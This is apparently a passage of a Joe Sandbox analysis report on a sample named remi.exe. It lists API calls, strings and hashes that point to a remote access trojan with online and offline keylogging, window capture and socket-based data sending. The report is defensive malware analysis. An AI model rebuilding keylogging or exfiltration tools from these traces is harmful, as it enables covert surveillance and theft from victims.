                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 578e6bc7a4fc1a2bb7a9e58197017e828bee5b66154445d614d46d91064b4efe
                                                                                                                                                                                                                                                                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 578e6bc7a4fc1a2bb7a9e58197017e828bee5b66154445d614d46d91064b4efe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044E1A0
                                                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                                                                                                                                                                                                                                                                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446F7D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446FA4
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                                                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044F7B5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044F7C7
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044F7D9
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044F7EB
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044F7FD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                                                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00443305
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00443317
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044332A
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044333B
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044334C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                                                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                                                                                                                                • String ID: (FG
                                                                                                                                                                                                                                                                                                • API String ID: 3142014140-2273637114
                                                                                                                                                                                                                                                                                                • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                                                                                                                                                                                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044D5C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                                                                                                                                • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                                                                                • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                                                                                                                                                                                                                • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                                                                                • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                                                                                • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                                                                                • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                                                                                                                                                                                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\remi.exe,00000104), ref: 00442714
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004427DF
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004427E9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\remi.exe
                                                                                                                                                                                                                                                                                                • API String ID: 2506810119-3988215352
                                                                                                                                                                                                                                                                                                • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                                                                                                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                                                                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                                                                                                                                • API String ID: 368326130-2663660666
                                                                                                                                                                                                                                                                                                • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                                                                                                                                                                                                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                                                                                                                • String ID: Offline Keylogger Started
                                                                                                                                                                                                                                                                                                • API String ID: 465354869-4114347211
                                                                                                                                                                                                                                                                                                • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                                                                                                                                                                                                                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                                                                                                                                • String ID: Online Keylogger Started
                                                                                                                                                                                                                                                                                                • API String ID: 112202259-1258561607
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                                                                                                                                                                                                                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                • String ID: `@
                                                                                                                                                                                                                                                                                                • API String ID: 2583163307-951712118
                                                                                                                                                                                                                                                                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                                                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                                                                                • API String ID: 2532271599-1507639952
                                                                                                                                                                                                                                                                                                • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                                                                                                                                                                                                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                                                                                                                • String ID: Connection Timeout
                                                                                                                                                                                                                                                                                                • API String ID: 2055531096-499159329
                                                                                                                                                                                                                                                                                                • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                                                                                                                                                                                                                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
